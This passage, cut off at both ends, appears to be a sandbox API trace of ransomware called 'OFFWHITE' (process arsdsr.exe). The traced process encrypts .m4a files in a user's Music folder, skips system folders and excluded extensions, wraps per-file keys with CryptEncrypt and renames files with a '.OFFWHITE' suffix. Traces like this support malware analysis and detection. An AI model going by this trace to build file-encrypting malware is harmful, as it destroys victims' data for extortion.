lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.917] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.917] lstrcmpiW (lpString1="of3LtF9siYb.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.917] GetProcessHeap () returned 0x500000 [0134.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531830 [0134.917] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\of3ltf9siyb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.918] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=35857) returned 1 [0134.918] GetProcessHeap () returned 0x500000 [0134.918] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.918] GetProcessHeap () returned 0x500000 [0134.918] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.918] GetProcessHeap () returned 0x500000 [0134.918] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.918] GetProcessHeap () returned 0x500000 [0134.918] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.918] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.918] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.918] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.918] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.918] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.918] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.918] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.918] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.918] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.919] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.919] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.919] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.919] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8c11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.919] SetLastError (dwErrCode=0x0) [0134.919] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.921] GetLastError () returned 0x0 [0134.921] GetLastError () returned 0x0 [0134.921] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8d11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.921] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.921] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8e11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.921] WriteFile (in: hFile=0x218, lpBuffer=0x531830*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531830*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.921] GetProcessHeap () returned 0x500000 [0134.921] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8c11) returned 0x55c7c8 [0134.921] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.921] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x8c11, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x8c11, lpOverlapped=0x0) returned 1 [0134.924] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.924] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x8c11, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x8c11, lpOverlapped=0x0) returned 1 [0134.925] GetProcessHeap () returned 0x500000 [0134.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.925] CloseHandle (hObject=0x218) returned 1 [0134.927] GetProcessHeap () returned 0x500000 [0134.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.927] GetProcessHeap () returned 0x500000 [0134.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.927] GetProcessHeap () returned 0x500000 [0134.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.927] GetProcessHeap () returned 0x500000 [0134.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.927] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a" [0134.927] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a.OFFWHITE" [0134.927] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\of3ltf9siyb.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\of3LtF9siYb.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\of3ltf9siyb.m4a.offwhite")) returned 1 [0134.928] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12876eb0, ftCreationTime.dwHighDateTime=0x1d5da1d, ftLastAccessTime.dwLowDateTime=0x4da759b0, ftLastAccessTime.dwHighDateTime=0x1d5e07b, ftLastWriteTime.dwLowDateTime=0x4da759b0, ftLastWriteTime.dwHighDateTime=0x1d5e07b, nFileSizeHigh=0x0, nFileSizeLow=0x14fd1, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="p7YMJ.m4a", cAlternateFileName="")) returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2=".") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="..") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="...") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="windows") returned -1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="$recycle.bin") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="rsa") returned -1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="ntuser.dat") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="programdata") returned -1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="appdata") returned 1 [0134.928] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="program files") returned -1 [0134.929] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="program files (x86)") returned -1 [0134.929] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.929] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="p7YMJ.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a" [0134.929] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.929] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.929] PathFindExtensionW (pszPath="p7YMJ.m4a") returned=".m4a" [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.929] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.929] lstrcmpiW (lpString1="p7YMJ.m4a", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.929] GetProcessHeap () returned 0x500000 [0134.929] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531840 [0134.929] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\p7ymj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.930] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=85969) returned 1 [0134.930] GetProcessHeap () returned 0x500000 [0134.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.930] GetProcessHeap () returned 0x500000 [0134.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.930] GetProcessHeap () returned 0x500000 [0134.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.930] GetProcessHeap () returned 0x500000 [0134.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.930] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.930] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.930] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.930] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.930] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.930] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.930] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.930] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.930] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.931] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.931] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.931] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.931] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x14fd1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.931] SetLastError (dwErrCode=0x0) [0134.931] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.934] GetLastError () returned 0x0 [0134.934] GetLastError () returned 0x0 [0134.934] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x150d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.934] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.934] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x151d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.934] WriteFile (in: hFile=0x218, lpBuffer=0x531840*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531840*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.934] GetProcessHeap () returned 0x500000 [0134.934] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14fd1) returned 0x55c7c8 [0134.934] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.934] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x14fd1, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x14fd1, lpOverlapped=0x0) returned 1 [0134.940] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.940] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x14fd1, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x14fd1, lpOverlapped=0x0) returned 1 [0134.941] GetProcessHeap () returned 0x500000 [0134.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.941] CloseHandle (hObject=0x218) returned 1 [0134.943] GetProcessHeap () returned 0x500000 [0134.943] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.943] GetProcessHeap () returned 0x500000 [0134.943] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.943] GetProcessHeap () returned 0x500000 [0134.943] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.943] GetProcessHeap () returned 0x500000 [0134.943] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.943] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a" [0134.943] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a.OFFWHITE" [0134.943] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\p7ymj.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\p7YMJ.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\p7ymj.m4a.offwhite")) returned 1 [0134.944] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d76f190, ftCreationTime.dwHighDateTime=0x1d5d940, ftLastAccessTime.dwLowDateTime=0xb2cbe670, ftLastAccessTime.dwHighDateTime=0x1d5e4d2, ftLastWriteTime.dwLowDateTime=0xb2cbe670, ftLastWriteTime.dwHighDateTime=0x1d5e4d2, nFileSizeHigh=0x0, nFileSizeLow=0x18055, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="SybeS.m4a", cAlternateFileName="")) returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2=".") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="..") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="...") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="windows") returned -1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="$recycle.bin") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="rsa") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="ntuser.dat") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="programdata") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="appdata") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="program files") returned 1 [0134.944] lstrcmpiW (lpString1="SybeS.m4a", lpString2="program files (x86)") returned 1 [0134.944] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.945] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="SybeS.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a" [0134.945] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.945] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.945] PathFindExtensionW (pszPath="SybeS.m4a") returned=".m4a" [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.945] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.945] lstrcmpiW (lpString1="SybeS.m4a", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.945] GetProcessHeap () returned 0x500000 [0134.945] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531850 [0134.945] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\SybeS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\sybes.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.946] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=98389) returned 1 [0134.946] GetProcessHeap () returned 0x500000 [0134.946] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.947] GetProcessHeap () returned 0x500000 [0134.947] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.947] GetProcessHeap () returned 0x500000 [0134.947] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.947] GetProcessHeap () returned 0x500000 [0134.947] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.947] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.947] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.947] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.947] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.947] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.947] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.947] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.947] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.947] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.948] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.948] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.948] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.948] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18055, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.948] SetLastError (dwErrCode=0x0) [0134.948] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.950] GetLastError () returned 0x0 [0134.950] GetLastError () returned 0x0 [0134.950] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x18155, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.950] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, 